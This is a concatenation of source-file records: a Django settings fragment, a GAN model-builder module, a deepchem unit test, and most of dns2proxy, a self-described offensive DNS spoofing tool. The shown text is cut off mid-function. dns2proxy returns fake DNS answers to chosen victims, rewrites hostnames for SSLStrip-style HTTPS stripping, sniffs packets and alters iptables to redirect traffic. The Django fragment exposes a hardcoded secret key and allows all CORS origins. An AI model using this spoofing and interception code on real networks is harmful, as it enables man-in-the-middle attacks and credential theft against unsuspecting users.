WARNING: keep the secret key used in production secret!\nSECRET_KEY = '*(qi2^67--t7g^b#4@amwxlpmawg2a@o^^6zm@pyhvui$44r!$'\n#\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get('S_DEBUG')\n\nALLOWED_HOSTS = ['127.0.0.1', 'localhost', '.lofichan.ru', 'api.lofichan.ru', 'lofichan.ru', 'st.lofichan.ru']\nCORS_ORIGIN_ALLOW_ALL = True\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'corsheaders',\n 'api',\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'lofiback.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'lofiback.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': os.environ.get('DB_NAME_L'),\n 'USER': os.environ.get('DB_USER'),\n 'PASSWORD': os.environ.get('DB_PASSWORD'),\n 'HOST': os.environ.get('DB_HOST'),\n 'PORT': os.environ.get('DB_PORT')\n }\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGE_CODE = 'ru-ru'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\nPROJECT_DIR = os.path.dirname(os.path.abspath(__file__))\nSTATIC_ROOT = os.path.join(PROJECT_DIR, 'templates')\nSTATIC_URL = '/static/'\nSTATICFILES_DIRS = [\n os.path.join(BASE_DIR, \"templates\")\n]\n"} {"ext": "py", "sha": "1a3038d94c2a4ee31ee03541ef314aa0d483e6c9", "content": "# python3.7\n\"\"\"Collects all available models together.\"\"\"\n\nfrom .model_zoo import MODEL_ZOO\nfrom .pggan_generator import PGGANGenerator\nfrom .pggan_discriminator import PGGANDiscriminator\nfrom .stylegan_generator import StyleGANGenerator\nfrom .stylegan_discriminator import StyleGANDiscriminator\nfrom .stylegan2_generator import StyleGAN2Generator\nfrom .stylegan2_discriminator import StyleGAN2Discriminator\nfrom .stylegan2_gs_generator import StyleGAN2_GS_Generator\n# from op import FusedLeakyReLU, fused_leaky_relu, upfirdn2d\n\n__all__ = [\n 'MODEL_ZOO', 'PGGANGenerator', 'PGGANDiscriminator', 'StyleGANGenerator',\n 'StyleGANDiscriminator', 'StyleGAN2Generator', 'StyleGAN2Discriminator',\n 'StyleGAN2_GS_Generator', 'build_generator', 'build_discriminator', 'build_model', \n]\n\n_GAN_TYPES_ALLOWED = ['pggan', 'stylegan', 'stylegan2', 'stylegan2_gs']\n_MODULES_ALLOWED = ['generator', 'discriminator']\n\n\ndef build_generator(gan_type, resolution, **kwargs):\n \"\"\"Builds generator by GAN type.\n\n Args:\n gan_type: GAN type to which the generator belong.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the generator.\n\n Raises:\n ValueError: If the `gan_type` is not supported.\n NotImplementedError: If the `gan_type` is not implemented.\n \"\"\"\n if gan_type not in _GAN_TYPES_ALLOWED:\n raise ValueError(f'Invalid GAN type: `{gan_type}`!\\n'\n f'Types allowed: {_GAN_TYPES_ALLOWED}.')\n\n if gan_type == 'pggan':\n return PGGANGenerator(resolution, **kwargs)\n if gan_type == 'stylegan':\n return StyleGANGenerator(resolution, **kwargs)\n if gan_type == 'stylegan2':\n return StyleGAN2Generator(resolution, **kwargs)\n if gan_type == 'stylegan2_gs':\n return StyleGAN2_GS_Generator(resolution, **kwargs)\n raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')\n\n\ndef build_discriminator(gan_type, resolution, **kwargs):\n \"\"\"Builds discriminator by GAN type.\n\n Args:\n gan_type: GAN type to which the discriminator belong.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the discriminator.\n\n Raises:\n ValueError: If the `gan_type` is not supported.\n NotImplementedError: If the `gan_type` is not implemented.\n \"\"\"\n if gan_type not in _GAN_TYPES_ALLOWED:\n raise ValueError(f'Invalid GAN type: `{gan_type}`!\\n'\n f'Types allowed: {_GAN_TYPES_ALLOWED}.')\n\n if gan_type == 'pggan':\n return PGGANDiscriminator(resolution, **kwargs)\n if gan_type == 'stylegan':\n return StyleGANDiscriminator(resolution, **kwargs)\n if gan_type == 'stylegan2':\n return StyleGAN2Discriminator(resolution, **kwargs)\n raise NotImplementedError(f'Unsupported GAN type `{gan_type}`!')\n\n\ndef build_model(gan_type, module, resolution, **kwargs):\n \"\"\"Builds a GAN module (generator/discriminator/etc).\n\n Args:\n gan_type: GAN type to which the model belong.\n module: GAN module to build, such as generator or discrimiantor.\n resolution: Synthesis resolution.\n **kwargs: Additional arguments to build the discriminator.\n\n Raises:\n ValueError: If the `module` is not supported.\n NotImplementedError: If the `module` is not implemented.\n \"\"\"\n if module not in _MODULES_ALLOWED:\n raise ValueError(f'Invalid module: `{module}`!\\n'\n f'Modules allowed: {_MODULES_ALLOWED}.')\n\n if module == 'generator':\n return build_generator(gan_type, resolution, **kwargs)\n if module == 'discriminator':\n return build_discriminator(gan_type, resolution, **kwargs)\n raise NotImplementedError(f'Unsupported module `{module}`!')\n\n\ndef parse_gan_type(module):\n \"\"\"Parses GAN type of a given module.\n\n Args:\n module: The module to parse GAN type from.\n\n Returns:\n A string, indicating the GAN type.\n\n Raises:\n ValueError: If the GAN type is unknown.\n \"\"\"\n if isinstance(module, (PGGANGenerator, PGGANDiscriminator)):\n return 'pggan'\n if isinstance(module, (StyleGANGenerator, StyleGANDiscriminator)):\n return 'stylegan'\n if isinstance(module, (StyleGAN2Generator, StyleGAN2Discriminator)):\n return 'stylegan2'\n if isinstance(module, (StyleGAN2_GS_Generator, StyleGAN2Discriminator)):\n return 'stylegan2_gs'\n raise ValueError(f'Unable to parse GAN type from type `{type(module)}`!')\n"} {"ext": "py", "sha": "1a3038fb7ec02caeb8de6f54fa19c0c5fe51e69c", "content": "import os\nimport unittest\nimport numpy as np\nfrom deepchem.utils import rdkit_util\nfrom deepchem.utils.fragment_util import get_contact_atom_indices\nfrom deepchem.utils.fragment_util import merge_molecular_fragments\nfrom deepchem.utils.fragment_util import get_partial_charge\nfrom deepchem.utils.fragment_util import strip_hydrogens\nfrom deepchem.utils.fragment_util import MolecularFragment\nfrom deepchem.utils.fragment_util import AtomShim\n\n\nclass TestFragmentUtil(unittest.TestCase):\n\n def setUp(self):\n # TODO test more formats for ligand\n current_dir = os.path.dirname(os.path.realpath(__file__))\n self.protein_file = os.path.join(\n current_dir, '../../feat/tests/data/3ws9_protein_fixer_rdkit.pdb')\n self.ligand_file = os.path.join(current_dir,\n '../../feat/tests/data/3ws9_ligand.sdf')\n\n def test_get_contact_atom_indices(self):\n complexes = rdkit_util.load_complex([self.protein_file, self.ligand_file])\n contact_indices = get_contact_atom_indices(complexes)\n assert len(contact_indices) == 2\n\n def test_create_molecular_fragment(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n assert len(mol_rdk.GetAtoms()) == len(fragment.GetAtoms())\n assert (fragment.GetCoords() == mol_xyz).all()\n\n def test_strip_hydrogens(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n\n # Test on RDKit\n frag = strip_hydrogens(mol_xyz, mol_rdk)\n\n def test_merge_molecular_fragments(self):\n mol_xyz, mol_rdk = rdkit_util.load_molecule(self.ligand_file)\n fragment1 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n fragment2 = MolecularFragment(mol_rdk.GetAtoms(), mol_xyz)\n joint = merge_molecular_fragments([fragment1, fragment2])\n assert len(mol_rdk.GetAtoms()) * 2 == len(joint.GetAtoms())\n\n def test_get_partial_charge(self):\n from rdkit import Chem\n mol = Chem.MolFromSmiles(\"CC\")\n atom = mol.GetAtoms()[0]\n partial_charge = get_partial_charge(atom)\n assert partial_charge == 0\n\n def test_atom_shim(self):\n atomic_num = 5\n partial_charge = 1\n atom_coords = np.array([0., 1., 2.])\n shim = AtomShim(atomic_num, partial_charge, atom_coords)\n assert shim.GetAtomicNum() == atomic_num\n assert shim.GetPartialCharge() == partial_charge\n assert (shim.GetCoords() == atom_coords).all()\n"} {"ext": "py", "sha": "1a303993436f86b3ec594b86e83d431455b50013", "content": "#!/usr/bin/python2.6\n'''\ndns2proxy for offensive cybersecurity v1.0\n\n\npython dns2proxy.py -h for Usage.\n\nExample:\npython2.6 dns2proxy.py -i eth0 -u 192.168.1.101 -d 192.168.1.200\n\nExample for no forwarding (only configured domain based queries and spoofed hosts):\n python2.6 dns2proxy.py -i eth0 -noforward\n\nExample for no forwarding but add IPs\n python dns2proxy.py -i eth0 -I 192.168.1.101,90.1.1.1,155.54.1.1 -noforward\n\nAuthor: Leonardo Nve ( leonardo.nve@gmail.com)\n'''\n\n\nimport dns.message\nimport dns.rrset\nimport dns.resolver\nimport socket\nimport numbers\nimport threading\nfrom struct import *\nimport datetime\nimport pcapy\nimport os\nimport signal\nimport errno\nfrom time import sleep\nimport argparse\n\n\nconsultas = {}\nspoof = {}\ndominios = {}\nnospoof = []\nnospoofto = []\nvictims = []\n\nLOGREQFILE = \"dnslog.txt\"\nLOGSNIFFFILE = \"snifflog.txt\"\nLOGALERTFILE = \"dnsalert.txt\"\nRESOLVCONF = \"resolv.conf\"\n\nvictim_file = \"victims.cfg\"\nnospoof_file = \"nospoof.cfg\"\nnospoofto_file = \"nospoofto.cfg\"\nspecific_file = \"spoof.cfg\"\ndominios_file = \"domains.cfg\"\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-N\", \"--noforward\", help=\"DNS Fowarding OFF (default ON)\", action=\"store_true\")\nparser.add_argument(\"-i\", \"--interface\", help=\"Interface to use\", default=\"eth0\")\nparser.add_argument(\"-u\", \"--ip1\", help=\"First IP to add at the response\", default=None)\nparser.add_argument(\"-d\", \"--ip2\", help=\"Second IP to add at the response\", default=None)\nparser.add_argument(\"-I\", \"--ips\", help=\"List of IPs to add after ip1,ip2 separated with commas\", default=None)\nparser.add_argument(\"-S\", \"--silent\", help=\"Silent mode\", action=\"store_true\")\nparser.add_argument(\"-A\", \"--adminIP\", help=\"Administrator IP for no filtering\", default=\"192.168.0.1\")\n\nargs = parser.parse_args()\n\ndebug = not args.silent\ndev = args.interface\nadminip = args.adminIP\nip1 = args.ip1\nip2 = args.ip2\nForward = not args.noforward\n\nfake_ips = []\n# List of of ips\nif args.ips is not None:\n for ip in args.ips.split(\",\"):\n fake_ips.append(ip)\n\nResolver = dns.resolver.Resolver()\n\n######################\n# GENERAL SECTION #\n######################\n\n\ndef save_req(lfile, str):\n f = open(lfile, \"a\")\n f.write(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\") + ' ' + str)\n f.close()\n\n\ndef SIGUSR1_handle(signalnum, frame):\n global noserv\n global Resolver\n noserv = 0\n DEBUGLOG('Reconfiguring....')\n process_files()\n Resolver.reset()\n Resolver.read_resolv_conf(RESOLVCONF)\n return\n\n\ndef process_files():\n global nospoof\n global spoof\n global nospoof_file\n global specific_file\n global dominios_file\n global dominios\n global nospoofto_file\n\n for i in nospoof[:]:\n nospoof.remove(i)\n\n for i in nospoofto[:]:\n nospoofto.remove(i)\n\n for i in victims[:]:\n victims.remove(i)\n\n dominios.clear()\n spoof.clear()\n\n nsfile = open(nospoof_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Non spoofing ' + h[0])\n nospoof.append(h[0])\n\n nsfile.close()\n\n nsfile = open(victim_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Spoofing only to ' + h[0])\n victims.append(h[0])\n\n nsfile.close()\n\n nsfile = open(nospoofto_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 0:\n DEBUGLOG('Non spoofing to ' + h[0])\n nospoofto.append(h[0])\n\n nsfile.close()\n\n nsfile = open(specific_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 1:\n DEBUGLOG('Specific host spoofing ' + h[0] + ' with ' + h[1])\n spoof[h[0]] = h[1]\n\n nsfile.close()\n nsfile = open(dominios_file, 'r')\n for line in nsfile:\n if line[0] == '#':\n continue\n h = line.split()\n if len(h) > 1:\n DEBUGLOG('Specific domain IP ' + h[0] + ' with ' + h[1])\n dominios[h[0]] = h[1]\n\n nsfile.close()\n return\n\n\ndef DEBUGLOG(str):\n global debug\n if debug:\n print str\n return\n\n\ndef handler_msg(id):\n os.popen('./handler_msg.sh %s >> handler_msg.log 2>> handler_msg_error.log &'%id.replace('`','_').replace(';','_').replace('|','_').replace('&','_'))\n return\n\n######################\n# SNIFFER SECTION #\n######################\n\nclass ThreadSniffer(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n\n def run(self):\n #DEBUGLOG( self.getName(), \" Sniffer Waiting connections....\")\n go()\n\ndef go():\n global ip1\n global dev\n bpffilter = \"dst host %s and not src host %s and !(tcp dst port 80 or tcp dst port 443) and (not host %s)\" % (\n ip1, ip1, adminip)\n cap = pcapy.open_live(dev, 255, 1, 0)\n cap.setfilter(bpffilter)\n DEBUGLOG( \"Starting sniffing in (%s = %s)....\" % (dev, ip1))\n\n #start sniffing packets\n while True:\n try:\n (header, packet) = cap.next()\n parse_packet(packet)\n except:\n pass\n #DEBUGLOG( ('%s: captured %d bytes, truncated to %d bytes' %(datetime.datetime.now(), header.getlen(), header.getcaplen())))\n\n#function to parse a packet\ndef parse_packet(packet):\n eth_length = 14\n eth_protocol = 8\n global ip1\n global consultas\n global ip2\n\n #Parse IP packets, IP Protocol number = 8\n if eth_protocol == 8:\n #Parse IP header\n #take first 20 characters for the ip header\n ip_header = packet[eth_length:20 + eth_length]\n\n #now unpack them :)\n iph = unpack('!BBHHHBBH4s4s', ip_header)\n\n version_ihl = iph[0]\n #version = version_ihl >> 4\n ihl = version_ihl & 0xF\n\n iph_length = ihl * 4\n\n #ttl = iph[5]\n protocol = iph[6]\n s_addr = socket.inet_ntoa(iph[8])\n d_addr = socket.inet_ntoa(iph[9])\n\n\n\n #TCP protocol\n if protocol == 6:\n t = iph_length + eth_length\n tcp_header = packet[t:t + 20]\n\n #now unpack them :)\n tcph = unpack('!HHLLBBHHH', tcp_header)\n\n source_port = tcph[0]\n dest_port = tcph[1]\n # sequence = tcph[2]\n # acknowledgement = tcph[3]\n # doff_reserved = tcph[4]\n # tcph_length = doff_reserved >> 4\n\n\n\n if consultas.has_key(str(s_addr)):\n DEBUGLOG(' ==> Source Address : ' + str(s_addr) + ' * Destination Address : ' + str(d_addr))\n DEBUGLOG(' Source Port : ' + str(source_port) + ' * Dest Port : ' + str(dest_port))\n # \tprint '>>>> '+str(s_addr)+' esta en la lista!!!!.....'\n comando = 'sh ./IPBouncer.sh %s %s %s %s' % (\n ip2, str(dest_port), consultas[str(s_addr)], str(dest_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n #print '>>>> ' + comando\n comando = '/sbin/iptables -D INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (\n ip1, str(dest_port), str(s_addr), str(source_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n comando = '/sbin/iptables -A INPUT -p tcp -d %s --dport %s -s %s --sport %s --j REJECT --reject-with tcp-reset' % (\n ip1, str(dest_port), str(s_addr), str(source_port))\n os.system(comando.replace(';','_').replace('|','_').replace('&','_').replace('`','_'))\n #print '>>>> ' + comando\n\n #UDP packets\n elif protocol == 17:\n u = iph_length + eth_length\n #udph_length = 8\n #udp_header = packet[u:u + 8]\n #now unpack them :)\n #udph = unpack('!HHHH', udp_header)\n #source_port = udph[0]\n #dest_port = udph[1]\n #length = udph[2]\n #checksum = udph[3]\n #DEBUGLOG('Source Port : ' + str(source_port) + ' Dest Port : ' + str(dest_port) + ' Length : ' + str(length) + ' Checksum : ' + str(checksum))\n #h_size = eth_length + iph_length + udph_length\n #data_size = len(packet) - h_size\n #get data from the packet\n #data = packet[h_size:]\n\n\n######################\n# DNS SECTION #\n######################\n\ndef respuestas(name, type):\n global Resolver\n\n DEBUGLOG('Query = ' + name + ' ' + type)\n try:\n answers = Resolver.query(name, type)\n except Exception, e:\n DEBUGLOG('Exception...')\n return 0\n return answers\n\n\ndef requestHandler(address, message):\n resp = None\n dosleep = False\n try:\n message_id = ord(message[0]) * 256 + ord(message[1])\n DEBUGLOG('msg id = ' + str(message_id))\n if message_id in serving_ids:\n DEBUGLOG('I am already serving this request.')\n return\n serving_ids.append(message_id)\n DEBUGLOG('Client IP: ' + address[0])\n prov_ip = address[0]\n try:\n msg = dns.message.from_wire(message)\n try:\n op = msg.opcode()\n if op == 0:\n # standard and inverse query\n qs = msg.question\n if len(qs) > 0:\n q = qs[0]\n DEBUGLOG('request is ' + str(q))\n save_req(LOGREQFILE, 'Client IP: ' + address[0] + ' request is ' + str(q) + '\\n')\n if q.rdtype == dns.rdatatype.A:\n DEBUGLOG('Doing the A query....')\n resp, dosleep = std_A_qry(msg, prov_ip)\n elif q.rdtype == dns.rdatatype.PTR:\n #DEBUGLOG('Doing the PTR query....')\n resp = std_PTR_qry(msg)\n elif q.rdtype == dns.rdatatype.MX:\n DEBUGLOG('Doing the MX query....')\n resp = std_MX_qry(msg)\n elif q.rdtype == dns.rdatatype.TXT:\n #DEBUGLOG('Doing the TXT query....')\n resp = std_TXT_qry(msg)\n elif q.rdtype == dns.rdatatype.AAAA:\n #DEBUGLOG('Doing the AAAA query....')\n resp = std_AAAA_qry(msg)\n else:\n # not implemented\n resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented\n else:\n # not implemented\n resp = make_response(qry=msg, RCODE=4) # RCODE = 4 Not Implemented\n\n except Exception, e:\n DEBUGLOG('got ' + repr(e))\n resp = make_response(qry=msg, RCODE=2) # RCODE = 2 Server Error\n DEBUGLOG('resp = ' + repr(resp.to_wire()))\n except Exception, e:\n DEBUGLOG('got ' + repr(e))\n resp = make_response(id=message_id, RCODE=1) # RCODE = 1 Format Error\n DEBUGLOG('resp = ' + repr(resp.to_wire()))\n except Exception, e:\n # message was crap, not even the ID\n DEBUGLOG('got ' + repr(e))\n\n if resp:\n s.sendto(resp.to_wire(), address)\n if dosleep: sleep(1) # Performance downgrade no tested jet\n\n\ndef std_PTR_qry(msg):\n qs = msg.question\n DEBUGLOG( str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg)\n hosts = respuestas(iparpa[:-1], 'PTR')\n if isinstance(hosts, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n\n for host in hosts:\n DEBUGLOG('Adding ' + host.to_text())\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.PTR, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\n\ndef std_MX_qry(msg):\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n #Temporal disable MX responses\n resp = make_response(qry=msg)\n hosts = respuestas(iparpa[:-1], 'MX')\n if isinstance(hosts, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp\n\n for host in hosts:\n DEBUGLOG('Adding ' + host.to_text())\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.MX, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\n\ndef std_TXT_qry(msg):\n qs = msg.question\n print str(len(qs)) + ' questions.'\n iparpa = qs[0].to_text().split(' ', 1)[0]\n print 'Host: ' + iparpa\n resp = make_response(qry=msg)\n\n host = iparpa[:-1]\n punto = host.find(\".\")\n dominio = host[punto:]\n host = \".\"+host\n spfresponse = ''\n if (dominio in dominios) or (host in dominios):\n ttl = 1\n DEBUGLOG('Alert domain! (TXT) ID: ' + host)\n # Here the HANDLE!\n #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\\n')\n if host in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%host\n if dominio in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%dominio\n DEBUGLOG('Responding with SPF = ' + spfresponse)\n rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)\n resp.answer.append(rrset)\n return resp\n\n\n hosts = respuestas(iparpa[:-1], 'TXT')\n if isinstance(hosts, numbers.Integral):\n print 'No host....'\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\n for host in hosts:\n print 'Adding ' + host.to_text()\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.TXT, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\ndef std_SPF_qry(msg):\n qs = msg.question\n print str(len(qs)) + ' questions.'\n iparpa = qs[0].to_text().split(' ', 1)[0]\n print 'Host: ' + iparpa\n resp = make_response(qry=msg)\n\n # host = iparpa[:-1]\n # punto = host.find(\".\")\n # dominio = host[punto:]\n # host = \".\"+host\n # if (dominio in dominios) or (host in dominios):\n # ttl = 1\n # DEBUGLOG('Alert domain! (TXT) ID: ' + host)\n # # Here the HANDLE!\n # #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n # save_req(LOGALERTFILE, 'Alert domain! (TXT) ID: ' + host+ '\\n')\n # if host in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%host\n # if dominio in dominios: spfresponse = \"v=spf1 a:mail%s/24 mx -all \"%dominio\n # DEBUGLOG('Responding with SPF = ' + spfresponse)\n # rrset = dns.rrset.from_text(iparpa, ttl, dns.rdataclass.IN, dns.rdatatype.TXT, spfresponse)\n # resp.answer.append(rrset)\n # return resp\n\n\n hosts = respuestas(iparpa[:-1], 'SPF')\n if isinstance(hosts, numbers.Integral):\n print 'No host....'\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\n for host in hosts:\n print 'Adding ' + host.to_text()\n rrset = dns.rrset.from_text(iparpa, 1000, dns.rdataclass.IN, dns.rdatatype.SPF, host.to_text())\n resp.answer.append(rrset)\n\n return resp\n\ndef std_AAAA_qry(msg):\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN\n return resp\n\ndef std_A_qry(msg, prov_ip):\n global consultas\n global ip1\n global ip2\n global fake_ips\n\n dosleep = False\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n resp = make_response(qry=msg)\n for q in qs:\n qname = q.name.to_text()[:-1]\n DEBUGLOG('q name = ' + qname)\n\n host = qname.lower()\n\n # dom1 = None\n # dominio = None\n\n # punto1 = host.rfind(\".\")\n # punto2 = host.rfind(\".\",0,punto1-1)\n\n # if punto1 > -1:\n # dom1 = host[punto1:]\n\n # if punto2 > -1:\n # dominio = host[punto2:]\n\n\n find_host = None\n for d in dominios:\n if d in host:\n find_host = d\n\n if (find_host is not None):\n ttl = 1\n # id = host[:punto2]\n # if dom1 in dominios:\n # id = host[:punto1]\n # dominio = dom1\n\n DEBUGLOG('Alert domain! ID: ' + host)\n # Here the HANDLE!\n #os.popen(\"python /yowsup/yowsup-cli -c /yowsup/config -s \\\"Host %s\\nIP %s\\\" > /dev/null &\"%(id,prov_ip));\n handler_msg(host)\n save_req(LOGALERTFILE, 'Alert domain! ID: ' + host + '\\n')\n \n if host not in spoof:\n DEBUGLOG('Responding with IP = ' + dominios[find_host])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[find_host])\n else:\n DEBUGLOG('Responding with IP = ' + spoof[host])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, spoof[host])\n\n resp.answer.append(rrset)\n return resp, dosleep\n\n if \".%s\"%host in dominios:\n dominio = \".%s\"%host\n ttl = 1\n DEBUGLOG('Responding with IP = ' + dominios[dominio])\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])\n resp.answer.append(rrset)\n return resp, dosleep\n\n ips = respuestas(qname.lower(), 'A')\n if qname.lower() not in spoof and isinstance(ips, numbers.Integral):\n # SSLSTRIP2 transformation\n punto = host.find(\".\")\n dominio = host[punto:]\n host2 = ''\n if host[:5] == 'wwww.' or host[:7] == 'social.':\n host2 = 'www%s' % dominio\n elif host[:3] == 'web':\n host2 = host[3:]\n elif host[:7] == 'cuentas':\n host2 = 'accounts%s' % dominio\n elif host[:5] == 'gmail':\n host2 = 'mail%s' % dominio\n elif host == 'chatenabled.gmail.google.com': # Yes, It is ugly....\n host2 = 'chatenabled.mail.google.com'\n if host2 != '':\n DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2))\n ips = respuestas(host2, 'A')\n\n #print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)\n\n if isinstance(ips, numbers.Integral):\n DEBUGLOG('No host....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n return resp, dosleep\n\n prov_resp = ips[0]\n consultas[prov_ip] = prov_resp\n\n ttl = 1\n if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):\n if host in spoof:\n save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\\n')\n for spoof_ip in spoof[host].split(\",\"):\n DEBUGLOG('Adding fake IP = ' + spoof_ip)\n rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)\n resp.answer.append(rrset)\n return resp, dosleep\n elif Forward:\n consultas[prov_ip] = prov_resp\n #print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)\n if ip1 is not None:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)\n DEBUGLOG('Adding fake IP = ' + ip1)\n resp.answer.append(rrset)\n if ip2 is not None:\n #Sleep only when using global resquest matrix\n dosleep = True\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)\n DEBUGLOG('Adding fake IP = ' + ip2)\n resp.answer.append(rrset)\n if len(fake_ips)>0:\n for fip in fake_ips:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)\n DEBUGLOG('Adding fake IP = ' + fip)\n resp.answer.append(rrset)\n\n if not Forward and prov_ip not in nospoofto:\n if len(fake_ips) == 0:\n DEBUGLOG('No forwarding....')\n resp = make_response(qry=msg, RCODE=3) # RCODE = 3\tNXDOMAIN\n elif len(fake_ips) > 0:\n DEBUGLOG('No forwarding (but adding fake IPs)...')\n for fip in fake_ips:\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)\n DEBUGLOG('Adding fake IP = ' + fip)\n resp.answer.append(rrset)\n return resp, dosleep\n\n for realip in ips:\n DEBUGLOG('Adding real IP = ' + realip.to_text())\n rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())\n resp.answer.append(rrset)\n\n return resp, dosleep\n\n\n# def std_A2_qry(msg):\n# \tqs = msg.question\n# \tDEBUGLOG(str(len(qs)) + ' questions.')\n# \tiparpa = qs[0].to_text().split(' ',1)[0]\n# \tprint 'Host: '+ iparpa\n# \tresp = make_response(qry=msg)\n# \trrset = dns.rrset.from_text(iparpa, 